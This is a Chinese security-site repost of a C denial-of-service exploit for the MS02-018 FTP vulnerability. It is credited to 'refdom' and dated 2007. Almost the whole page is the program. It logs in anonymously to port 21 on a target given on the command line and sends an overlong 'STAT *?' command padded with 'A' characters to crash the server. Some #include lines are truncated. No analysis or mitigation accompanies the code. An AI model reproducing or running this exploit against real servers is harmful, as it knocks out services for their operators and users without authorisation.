MS02-018中的FTP拒绝服务漏洞利用程序-网络通信专区

MS02-018中的FTP拒绝服务漏洞利用程序

作者：协议分析网编辑：王炯 2007-07-04 00:00

// 　　　　　　　　　　　
// FTPDOS by refdom
//
// Author: Refdom.
// Email: refdom@263.net
// HomePage: www.opengram.com
// Comment: MSO2-018
//
////////////////////////////////////////////////////////////
#include "stdafx.h"
#include
#include
#pragma comment (lib, "ws2_32.lib")
int main(int argc, char* argv[])
{WSADATA WSAData;
SOCKET sock = INVALID_SOCKET;
SOCKADDR_IN addr_in;
int nRetCode;
char szUser[] = "USER anonymous\r\n";
char szPassword[] = "PASS bill@microsoft.com\r\n";
char *pBuffer, *pExploit;
int nBufferSize = 260;
pBuffer = (char*) malloc(nBufferSize);
ZeroMemory(pBuffer, nBufferSize);
pExploit = (char*) malloc(241);
ZeroMemory(pExploit, 241);FillMemory(pExploit, 240, "A");
sprintf(pBuffer, "STAT *?%s\r\n", pExploit);
if (argc < 2)
{printf ("Enter targetip!\n");return 0;}
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
{printf ("WSAStartup error!\n");return 0;}
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (INVALID_SOCKET == sock)
{printf ("socket error!\n");goto Exit0;}
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(21);
addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);
nRetCode = connect(sock, (LPSOCKADDR)&addr_in, sizeof(addr_in));
if ( SOCKET_ERROR == nRetCode )
{printf ("connect error!\n");
goto Exit0;}printf ("Dos Starting...\n");
nRetCode = send(sock, szUser, sizeof(szUser), 0);
if (SOCKET_ERROR == nRetCode)
{printf ("send user error!\n");goto Exit0;}Sleep(1000);
nRetCode = send(sock, szPassword, sizeof(szPassword), 0);
if (SOCKET_ERROR == nRetCode)
{printf ("send password error!\n");goto Exit0;}
Sleep(1000); nRetCode = send(sock, pBuffer, nBufferSize, 0);
if (SOCKET_ERROR == nRetCode)
{printf ("send exploit error!\n");goto Exit0;}
Sleep(2000);printf ("Dos End.\n");
Exit0:if (sock != INVALID_SOCKET){closesocket(sock);}
free(pBuffer);free(pExploit);WSACleanup();return 0;}

文章转载地址：http://www.cnpaf.net/Class/hack/05121820345062174681.htm

关注我们